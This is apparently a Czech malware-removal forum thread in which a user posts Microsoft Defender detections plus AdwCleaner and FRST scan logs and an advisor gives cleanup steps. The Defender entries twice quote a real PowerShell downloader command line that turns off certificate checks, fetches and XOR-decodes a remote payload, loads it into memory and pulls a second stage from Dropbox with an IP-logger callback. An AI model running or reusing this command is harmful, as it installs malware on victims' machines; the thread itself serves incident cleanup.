Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2519.0, AS: 1.329.2519.0, NIS: 1.329.2519.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-20 10:29:02.0140000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2507.0, AS: 1.329.2507.0, NIS: 1.329.2507.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

==================== Memory info ===========================

BIOS: American Megatrends Inc. P1.30 05/25/2010
Motherboard: ASRock HM55-HT
Processor: Intel(R) Core(TM) i3 CPU M 350 @ 2.27GHz
Percentage of memory in use: 72%
Total physical RAM: 3767.05 MB
Available physical RAM: 1051.44 MB
Total Virtual: 7351.05 MB
Available Virtual: 4661.58 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:111.19 GB) (Free:60.17 GB) NTFS
Drive d: (Místní disk) (Fixed) (Total:465.76 GB) (Free:230.27 GB) NTFS
Drive e: (HDD Záloha) (Fixed) (Total:465.76 GB) (Free:63.57 GB) NTFS
Drive g: (HDD SERIÁLY) (Fixed) (Total:1862.56 GB) (Free:76.56 GB) FAT32

\\?\Volume{89fed6d2-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{89fed6d2-0000-0000-0000-a0d21b000000}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: 89FED6D2)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=111.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=509 MB) - (Type=27)

==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: B5BDF682)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==========================================================
Disk: 2 (Size: 1863 GB) (Disk ID: 055752AB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=0C)

==========================================================
Disk: 3 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: DD2566A6)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================

Diallix
Advisor
Posts: 2760
Registered: 27 Apr 2008 10:34

Re: Please check my log

#7 Post by Diallix »

Hello.

Download the AdwCleaner tool to your desktop; the download link is here: https://toolslib.net/downloads/finish/1/
Before running the tool, close all open program windows, that is, all programs running on the desktop.
Right-click the program -> Run as administrator.
Continue by clicking the Scan Now button and wait until the system scan finishes.
After the scan, leave all checkboxes and any threats found selected, and continue with the Clean and Repair button in the bottom-right corner.
After the PC restarts, AdwCleaner will launch; click View log file (Zobrazit soubor protokolu).
The log will open; copy its contents here.
My new book BOTNETY has been published! You can find information about it here: >> BOTNETY <<
---
We are looking for new recruits for our CyberSecurity UNIT. More information on what it involves and how to join can be found here: >> CyberSecurity UNIT <<
----
Low-level and high-level programmer - profile card here: card <<
----
Háveťárna - malware UPLOAD: >> upload <<
---
If you like my work and are satisfied with it, you can contact me at: diallix@centrum.sk, info@diallix.net or diallix@forum.viry.cz.
---
Currently active as:
- consultant, developer and tutor in intelligent malware research.
- tutor for students in SQL query languages (TSQL, PLSQL) and object-oriented programming (c++, c#, php).

On the forum I act as:
- viry.cz security authority
- Deputy tutor for newcomer training
- Founder of the Cyber Security unit

chenny
Visitor
Posts: 36
Registered: 06 Sep 2007 09:50

Re: Please check my log

#8 Post by chenny »

Here is the next log

# -------------------------------
# Malwarebytes AdwCleaner 8.0.9.0
# -------------------------------
# Build: 01-11-2021
# Database: 2021-01-11.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 01-20-2021
# Duration: 00:00:03
# OS: Windows 10 Pro
# Cleaned: 10
# Failed: 0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

No malicious folders cleaned.

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

No malicious registry entries cleaned.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

Deleted BS Player Customized Web Search
Deleted MyStart Search
Deleted MyStart Search
Deleted Search the web (Babylon)
Deleted Search the web (Babylon)
Deleted WebSearch
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [2186 octets] - [20/01/2021 16:59:03]
AdwCleaner[C00].txt - [2094 octets] - [20/01/2021 16:59:29]
AdwCleaner[S01].txt - [2027 octets] - [20/01/2021 17:10:25]
AdwCleaner[C01].txt - [2028 octets] - [20/01/2021 17:12:09]
AdwCleaner[S02].txt - [2149 octets] - [20/01/2021 19:08:48]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C02].txt ##########

Diallix
Advisor
Posts: 2760
Registered: 27 Apr 2008 10:34

Re: Please check my log

#9 Post by Diallix »

Please post new FRST + ADDITION logs.

chenny
Visitor
Posts: 36
Registered: 06 Sep 2007 09:50

Re: Please check my log

#10 Post by chenny »

FRST log

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-01-2021
Ran by IRENA-PC (administrator) on IRENA-PC (20-01-2021 19:42:40)
Running from C:\Users\IRENA-PC\Desktop
Loaded Profiles: IRENA-PC
Platform: Windows 10 Pro Version 2004 19041.746 (X64) Language: Čeština (Česko)
Default browser: Chrome
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Firebit OU -> Rainmeter) C:\Program Files\Rainmeter\Rainmeter.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(Open Source Developer, Robin Krom -> Greenshot) C:\Program Files\Greenshot\Greenshot.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(VIA Technologies Inc. -> VIA Technologies, Inc.) C:\Windows\System32\ViakaraokeSrv.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Greenshot] => C:\Program Files\Greenshot\Greenshot.exe [527792 2017-01-28] (Open Source Developer, Robin Krom -> Greenshot)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe [5491248 2020-12-07] (Adobe Inc. -> Adobe Systems Incorporated)
HKLM\...\Print\Monitors\us008 Langmon: C:\WINDOWS\system32\us008lm.dll [31256 2016-02-15] (Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Poslat do aplikace OneNote.lnk [2017-11-14]
ShortcutTarget: Poslat do aplikace OneNote.lnk -> C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rainmeter.lnk [2019-10-05]
ShortcutTarget: Rainmeter.lnk -> C:\Program Files\Rainmeter\Rainmeter.exe (Firebit OU -> Rainmeter)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0F781840-4995-487B-B8DB-7FF1EBC5C707} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-07] (Mozilla Corporation -> Mozilla Foundation)
Task: {10E62E26-1578-4A0E-8611-FFDA4C61A221} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {21567792-F593-4A2B-A8B0-FD12215C4505} - System32\Tasks\PrivaZer_SkipUAC => C:\Program Files (x86)\PrivaZer\PrivaZer.exe [19999848 2021-01-09] (Goversoft LLC -> Goversoft LLC)
Task: {2765CE0A-1B19-47DC-BC12-CDD903EF335B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {64EFD4BD-F0D7-4F88-AE46-F5DA6CEA8254} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {87D9290F-3525-4C2A-BBCB-0D49A626C8EE} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {8E9C0AAA-5D6D-45B9-8856-FD83EA5BEDC6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9567EB88-214D-4752-88E7-2B395BCEA8D3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EB806155-3D2A-4177-A203-0FD110F04427} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
Task: {F4FC8779-698F-4176-95A0-5286A8AEA159} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{3ca49153-5896-4467-b2d9-205cc451433b}: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{6275ca9c-c816-47f0-8729-a3236c979e44}: [DhcpNameServer] 192.168.0.1 1.1.1.1

Edge:
=======
DownloadDir: C:\Users\IRENA-PC\Downloads
Edge DefaultProfile: Default
Edge Profile: C:\Users\IRENA-PC\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-20]

FireFox:
========
FF DefaultProfile: woy2c7nl.default-1506939824614
FF ProfilePath: C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 [2021-01-20]
FF Homepage: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://www.seznam.cz/
FF Notifications: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://sktorrent.os.tc; hxxps://kryptomagazin.cz
FF NewTabOverride: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> Disabled: {672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}
FF Extension: (HLS Video Download) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\@hls.video.download.xpi [2021-01-05]
FF Extension: (Download with Ant Download Manager) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\antffw@antdownloadmanager.com.xpi [2021-01-05]
FF Extension: (Avast Online Security) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\wrc@avast.com.xpi [2020-06-19]
FF Extension: (Video Downloader for FireFox) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}.xpi [2021-01-05]
FF Extension: (KITVideofy) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{6c09ef97-fbbc-4dc1-bc9a-777b216f1303}.xpi [2021-01-05]
FF Extension: (Plná Peněženka Lištička Lite) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{85d8e8cc-273a-4845-a75b-4b44377c703c}.xpi [2021-01-13]
FF Extension: (Video DownloadHelper) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2020-12-16]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @java.com/DTPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\dtplugin\npDeployJava1.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\plugin2\npjp2.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default [2021-01-20]
CHR DownloadDir: D:\Filmy\Seriály\Telenovely
CHR Notifications: Default -> hxxps://app.expertoption.com; hxxps://app.plus500.com; hxxps://calendar.google.com; hxxps://findmedia.biz; hxxps://ganesha.goodly.pro; hxxps://gofesm.com; hxxps://kryptomagazin.sk; hxxps://my.jdownloader.org; hxxps://prokliky.cz; hxxps://solvena.ru; hxxps://thestreetlottery.com; hxxps://trading11.com; hxxps://watch-video.net; hxxps://www.facebook.com; hxxps://www.nej-ceny.cz; hxxps://www.netflix.com; hxxps://www.publish0x.com; hxxps://www.youtube.com; hxxps://zignaly.com
CHR HomePage: Default -> hxxps://www.seznam.cz/
CHR StartupUrls: Default -> "hxxp://seznam.cz/","hxxp://www.google.cz/","hxxps://www.google.com ... oogle.com/"
CHR Extension: (Easy Auto Refresh) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aabcgdmkeabbnleenpncegpcngjpnjkc [2019-07-01]
CHR Extension: (Seznam doplněk - Esko-) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blmojkbhnkkphngknkmgccmlenfaelkd [2019-10-08]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-30]
CHR Extension: (Aliexpress SuperStar česky, Historie cen a koruny) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ciclollkolafellcaolgccmfjldgpolo [2020-04-19]
CHR Extension: (YouTube Music) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cinhimbnkkaeohfgghhklpknlkffjgod [2021-01-14]
CHR Extension: (Image Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnpniohnfphhjihaiiggeabnkjhpaldj [2019-01-27]
CHR Extension: (ZenMate - IP & Browser Check) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\dchhalahcjpkabdgonjhoogdcipienhf [2017-01-30]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\egjdagpondeapnnockkjcocjdkfkffnb [2021-01-14]
CHR Extension: (Přehrávání | SledovaniTV.cz) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gccmmlklnkpaihbmbpcdknammjmmdocb [2021-01-14]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2021-01-15]
CHR Extension: (Stream Video Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-16]
CHR Extension: (Hangouts Google) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nckgahadagoaajjgafhacjanaoiihapd [2020-08-13]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (SS TV Remote) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\npciacphlpgklgcjgiamnmfjipjdkacf [2020-03-23]
CHR Extension: (Gmail) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-25]
CHR Extension: (Chrome Media Router) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-09]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-20]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-20]
CHR HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]

Brave:
=======
BRA Profile: C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2021-01-20]
BRA Extension: (McAfee® WebAdvisor) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm\2.0.673 [2019-02-09]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2019-02-09]
BRA Extension: (Brave Ad Block Updater (Default)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cffkpbalmllkdoenhmdmpbkajipdjfam [2019-02-23]
BRA Extension: (Brave Tor Client Updater (Windows)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cpoalefficncklhjfpglfiplenlpccdb [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm [2019-02-09]
BRA Extension: (Brave Ad Block Updater (CZE, SVK: EasyList Czech and Slovak)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\omkkefoeihpbpebhhbhmjekpnegokpbj [2019-02-23]
BRA Extension: (Brave HTTPS Everywhere Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oofiananboodjbbmdelgdommihjbkfag [2019-02-09]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5198064 2021-01-13] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R2 VIAKaraokeService; C:\WINDOWS\system32\viakaraokesrv.exe [36504 2015-06-22] (VIA Technologies Inc. -> VIA Technologies, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
S3 e2eVAWdm; C:\WINDOWS\System32\drivers\VAud_WDM.sys [112696 2017-07-12] (ARTRAY CO., LTD. -> e2eSoft)
R2 npf; C:\WINDOWS\system32\drivers\npf.sys [36600 2018-12-07] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
R3 nuviocir; C:\WINDOWS\system32\DRIVERS\nuviocir_x64.sys [40464 2015-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Nuvoton Technology Corp.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-01-20 18:40 - 2021-01-20 19:43 - 000020181 _____ C:\Users\IRENA-PC\Desktop\FRST.txt
